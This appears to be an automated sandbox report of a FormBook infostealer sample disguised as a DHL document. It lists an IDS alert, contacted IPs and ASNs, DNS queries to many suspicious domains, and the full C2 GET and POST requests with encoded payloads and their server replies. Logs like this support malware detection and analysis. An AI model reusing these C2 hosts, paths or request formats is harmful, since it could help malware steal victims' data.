Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 188.114.97.3:80

Source: Joe Sandbox View	IP Address: 199.192.21.169 199.192.21.169
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_0022CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0022CE44

Source: global traffic	HTTP traffic detected: GET /8jia/?Jz1hrtoh=9AvXHUmgXwE0NfntFKmj8Hbm8i5jHRBq7VXsu/oIh+Fo6BAMMd5sC+Z5JULGgnS66o+OMLcPn2vNzZv027oW9RccVG8++KvPU3TKo9usZOkcjq60umoFPYk=&UdJ=uBcLexhXPjVX9H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USHost: www.nosolofichas.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /4nhb/?UdJ=uBcLexhXPjVX9H&Jz1hrtoh=VRdPyVGvBNL0zGb6xrXYQR9ur0r2QTKUQOSO7cd8EnuFzx+YHnq+DUXdslaENlV63J3iVXi+q6zCQbLR2W+jpkzGPrjJexdKuJksLzp2XTbKL4ZngkaDzaE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USHost: www.maplesyrup7.clickConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /nmrk/?Jz1hrtoh=/0sxYx23xH8xi+Hy4RBlkRoqDT/P5tB28j8aWDRWCja+tef/r7M3KSHAsxEmH2Ql1ZDI27EdC/CcGrRNLTkBRaCB5yjhP6SE0vp9NThEHXhAy/LVFRuQiB4=&UdJ=uBcLexhXPjVX9H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USHost: www.marketyemen.holdingsConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /9aud/?Jz1hrtoh=r3lbX71h7q0AHy0oTe4pOi2BWk3NJWKXCKCSBMbv4rPFPtn+x9pbH5vfUhpnGKcWhU2ilqg7+CZg+6VCYnHULVR8JiBaz41iVPfXoiOh7626TGmYyz4nYPg=&UdJ=uBcLexhXPjVX9H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USHost: www.y6h6kn.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /4uqm/?Jz1hrtoh=ytwRTflRS7QAauuT+rgNUjccAkdy+e6lNAEJLLU2j1RodgpxpA5TvYH+ibGN3Boi82rz2U+CRnlw4tfWTnizPbPVR1zxex5DTfgIhP2VJOetwh1VZXY8GHE=&UdJ=uBcLexhXPjVX9H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USHost: www.x3kwqc5tye4vl90y.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /c83d/?Jz1hrtoh=jxTzUjVIZaofx7j+hjDqGolTZ9ADAJhT1kOq3tJuXTxbUN1TAIK6B8Trk2pOixsdDrzfQtiDoeEPrKkrg6mu919pzDDap9RanmPGwUgvds1osF4yHymni40=&UdJ=uBcLexhXPjVX9H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USHost: www.overlayoasis.questConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /7nib/?Jz1hrtoh=uKRRcKiI80JDE6w59YL8qO1xlerNcpHcKbVaQWL/Xt+siAoLAxBeiwuetBJvIJ3z2UyZcnBi9xP8ZgG+7UIAbjCkdt+hLoeNA1o349OPobYNbOTqAVNYTqM=&UdJ=uBcLexhXPjVX9H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USHost: www.sutbkn.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /stiu/?Jz1hrtoh=KuvrM/srG3MDLqFPtB2TlzBf7Ls4/9Y6mn0u9MF7YlgnCmWeycT1gm8orALA86E9qUKhYi6qgKN/iUA6gvmuZC9lpzJZsf3hJ4P2cxzhUv0czU+gn/+hx6Q=&UdJ=uBcLexhXPjVX9H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USHost: www.lonfor.websiteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /ricr/?Jz1hrtoh=DsJJ9LHvO2HIHRqZVScyyquLDFASZNq0lcbG2YQL94noaGFETLMOBonxxstsOEJaR2W2DKPzfgEtUmgcU+0uYV+kCJdhOpCyjrKYDUo1eaaYNgfh8khKz30=&UdJ=uBcLexhXPjVX9H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USHost: www.uzshou.worldConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /mywm/?Jz1hrtoh=IUYy1jDll+i8jXw9VA5MjpJVwSdABmjgj5hASYJF1IMJpVkU6oGvrctxMh0PV/CFKzqvEY5ZBre3he+5VeLrKbnInqLzH4Td90CNMEKkSDj9AjQVzK8xJbw=&UdJ=uBcLexhXPjVX9H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USHost: www.cruycq.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)

Source: global traffic	DNS traffic detected: DNS query: www.nosolofichas.online
Source: global traffic	DNS traffic detected: DNS query: www.clubhoodies.shop
Source: global traffic	DNS traffic detected: DNS query: www.maplesyrup7.click
Source: global traffic	DNS traffic detected: DNS query: www.marketyemen.holdings
Source: global traffic	DNS traffic detected: DNS query: www.y6h6kn.top
Source: global traffic	DNS traffic detected: DNS query: www.x3kwqc5tye4vl90y.top
Source: global traffic	DNS traffic detected: DNS query: www.overlayoasis.quest
Source: global traffic	DNS traffic detected: DNS query: www.sutbkn.info
Source: global traffic	DNS traffic detected: DNS query: www.lonfor.website
Source: global traffic	DNS traffic detected: DNS query: www.cozythreads.store
Source: global traffic	DNS traffic detected: DNS query: www.uzshou.world
Source: global traffic	DNS traffic detected: DNS query: www.cruycq.info
Source: global traffic	DNS traffic detected: DNS query: www.dnft.immo

Source: unknown

HTTP traffic detected: POST /4nhb/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.maplesyrup7.clickContent-Length: 205Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeOrigin: http://www.maplesyrup7.clickReferer: http://www.maplesyrup7.click/4nhb/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)Data Raw: 4a 7a 31 68 72 74 6f 68 3d 59 54 31 76 78 69 69 51 49 37 6e 6f 35 46 58 61 2f 62 33 47 4b 41 56 5a 31 53 75 78 53 41 2b 33 4d 4f 71 4b 7a 6f 77 47 63 30 79 71 78 53 44 38 4b 45 4c 4c 4b 32 58 2f 35 51 79 6c 4e 58 39 78 33 70 43 68 62 56 75 58 6c 49 53 6a 44 70 6e 66 6d 30 6a 74 7a 31 6a 6a 41 2b 6d 66 4e 78 56 37 73 65 38 76 41 6e 35 74 52 32 66 71 43 6f 46 51 6d 43 61 35 6b 71 77 78 61 37 6f 50 77 46 4d 41 6a 34 64 41 53 56 51 57 75 44 38 33 53 67 67 62 61 32 7a 73 2f 56 76 58 59 5a 34 71 66 61 79 65 6f 69 31 52 4d 44 6f 4f 61 33 4c 59 50 4d 4a 2b 58 58 33 55 41 45 64 77 4d 32 2b 74 53 6d 63 57 79 51 3d 3d Data Ascii: Jz1hrtoh=YT1vxiiQI7no5FXa/b3GKAVZ1SuxSA+3MOqKzowGc0yqxSD8KELLK2X/5QylNX9x3pChbVuXlISjDpnfm0jtz1jjA+mfNxV7se8vAn5tR2fqCoFQmCa5kqwxa7oPwFMAj4dASVQWuD83Sggba2zs/VvXYZ4qfayeoi1RMDoOa3LYPMJ+XX3UAEdwM2+tSmcWyQ==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 07 Jan 2025 11:24:05 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "674427dd-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 07 Jan 2025 11:24:07 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "674427dd-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 07 Jan 2025 11:24:10 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "674427dd-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 07 Jan 2025 11:24:12 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "674427dd-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Tue, 07 Jan 2025 11:24:19 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Tue, 07 Jan 2025 11:24:21 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Tue, 07 Jan 2025 11:24:24 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Tue, 07 Jan 2025 11:24:26 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
